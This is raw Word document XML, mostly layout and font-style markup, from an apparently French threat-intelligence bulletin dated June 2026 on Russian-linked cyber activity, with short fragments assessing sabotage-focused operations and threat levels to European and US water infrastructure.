            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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747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l’origine de cette intrusion.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748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6772298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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5"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Évaluation :</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> les activités liées à la Russie sont davantage axées sur le sabotage que celles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851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6945653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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</w:rPr>
                          <w:t xml:space="preserve">liées à l’Iran. Ce schéma s’inscrit dans la campagne hybride plus large menée par Moscou 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953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7119008</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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616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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">accès perturbateur à faible coût, création d’un climat de peur au sein de la population et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056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7292363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3683822" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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382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évaluation de la résilience des infrastructures occidentales.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1584" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2809875</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8281690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1979100" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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910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92"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Figure 32 – Principaux TTPs observés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2608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8516008</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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355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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Le niveau de menace reste élevé en Europe et dans les États voisins de l’OTAN, modéré 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3632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8689363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5314121" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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41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élevé dans les réseaux municipaux d’approvisionnement en eau américains exposés.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4656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9473587</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4174781" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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7478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z w:val="17"/>
                            <w:szCs w:val="17"/>
                            <w:vertAlign w:val="superscript"/>
                          </w:rPr>
                          <w:t xml:space="preserve">62</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-2"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://apnews.com/article/texas-muleshoe-water-systems-cyberattacks-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5680" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>901065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9619637</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2520266" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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026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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve">russia-5f388bf0d581fc8eb94b1190a7f29c3a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6704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10057785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1165987" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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98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Bulletin-APT-RU-2606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7728" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6466205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10057785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="703739" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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73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Bulletin n°XX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8752" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6638925</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10189230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="531507" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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50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Juin 2026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9776" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3686175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10189230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="226669" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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6669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101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80800" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>429894</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10189230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2277537" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53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7537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Actualité des codes et infrastructures russes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sectPr>
      <w:pgSz w:w="11906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0000000000000000000"/>
    <w:pitch w:val="variable"/>
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="OpenSymbol">
    <w:panose1 w:val="00000000000000000000"/>
    <w:pitch w:val="variable"/>
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="Liberation Sans Narrow">
    <w:panose1 w:val="00000000000000000000"/>
    <w:pitch w:val="fixed"/>
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="Liberation Mono">
    <w:panose1 w:val="00000000000000000000"/>
    <w:pitch w:val="fixed"/>
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="FiraCode Nerd Font Mono">
    <w:panose1 w:val="00000000000000000000"/>
    <w:pitch w:val="fixed"/>
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="FiraCode Nerd Font Mono Light">
    <w:panose1 w:val="00000000000000000000"/>
    <w:pitch w:val="fixed"/>
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="Noto Sans">
    <w:panose1 w:val="00000000000000000000"/>
    <w:pitch w:val="variable"/>
    <w:charset w:val="00"/>
  </w:font>
  <w:font w:name="DejaVu Sans Mono">
    <w:panose1 w:val="00000000000000000000"/>
    <w:pitch w:val="fixed"/>
    <w:charset w:val="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173F5B"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle20">
    <w:name w:val="fontstyle20"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:color w:val="0563C1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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color w:val="000000"/>
      <w:sz w:val="11"/>
      <w:szCs w:val="11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173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle92">
    <w:name w:val="fontstyle92"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18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b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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173F5B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr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173F5B"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle42">
    <w:name w:val="fontstyle42"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26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b/>
      <w:bCs/>
      <w:color w:val="ED7D31"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle04">
    <w:name w:val="fontstyle04"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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ED7D31"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32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i/>
      <w:iCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle24">
    <w:name w:val="fontstyle24"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18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000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle58">
    <w:name w:val="fontstyle58"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle30">
    <w:name w:val="fontstyle30"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow" w:cs="Liberation Sans Narrow" w:hint="default"/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle31">
    <w:name w:val="fontstyle31"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono" w:hint="default"/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle28">
    <w:name w:val="fontstyle28"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono" w:hAnsi="FiraCode Nerd Font Mono" w:cs="FiraCode Nerd Font Mono" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle34">
    <w:name w:val="fontstyle34"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow" w:cs="Liberation Sans Narrow" w:hint="default"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle40">
    <w:name w:val="fontstyle40"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono" w:hint="default"/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle91">
    <w:name w:val="fontstyle91"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle90">
    <w:name w:val="fontstyle90"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle33">
    <w:name w:val="fontstyle33"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono" w:hint="default"/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle89">
    <w:name w:val="fontstyle89"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="default"/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle83">
    <w:name w:val="fontstyle83"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow" w:cs="Liberation Sans Narrow" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle37">
    <w:name w:val="fontstyle37"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow" w:cs="Liberation Sans Narrow" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle57">
    <w:name w:val="fontstyle57"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow" w:cs="Liberation Sans Narrow" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle75">
    <w:name w:val="fontstyle75"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle22">
    <w:name w:val="fontstyle22"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle26">
    <w:name w:val="fontstyle26"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle74">
    <w:name w:val="fontstyle74"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow" w:cs="Liberation Sans Narrow" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle73">
    <w:name w:val="fontstyle73"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow" w:cs="Liberation Sans Narrow" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle60">
    <w:name w:val="fontstyle60"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="A5D6FF"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle72">
    <w:name w:val="fontstyle72"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="D7BA7D"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle54">
    <w:name w:val="fontstyle54"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="BBBEBF"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle55">
    <w:name w:val="fontstyle55"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="D4D4D4"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle53">
    <w:name w:val="fontstyle53"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="DCDCAA"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle25">
    <w:name w:val="fontstyle25"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle71">
    <w:name w:val="fontstyle71"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle43">
    <w:name w:val="fontstyle43"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle23">
    <w:name w:val="fontstyle23"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle32">
    <w:name w:val="fontstyle32"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle47">
    <w:name w:val="fontstyle47"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="FF7B72"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle48">
    <w:name w:val="fontstyle48"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="D4D4D4"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle46">
    <w:name w:val="fontstyle46"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="A5D6FF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle51">
    <w:name w:val="fontstyle51"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="FFA657"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle45">
    <w:name w:val="fontstyle45"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="DCDCAA"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle63">
    <w:name w:val="fontstyle63"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="569CD6"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle68">
    <w:name w:val="fontstyle68"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans" w:hint="default"/>
      <w:color w:val="BBBEBF"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle70">
    <w:name w:val="fontstyle70"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans" w:hint="default"/>
      <w:color w:val="DCDCAA"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle69">
    <w:name w:val="fontstyle69"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans" w:hint="default"/>
      <w:color w:val="D4D4D4"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle67">
    <w:name w:val="fontstyle67"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans" w:hint="default"/>
      <w:color w:val="FFA657"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle66">
    <w:name w:val="fontstyle66"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="B5CEA8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle65">
    <w:name w:val="fontstyle65"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="79C0FF"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle64">
    <w:name w:val="fontstyle64"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle62">
    <w:name w:val="fontstyle62"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
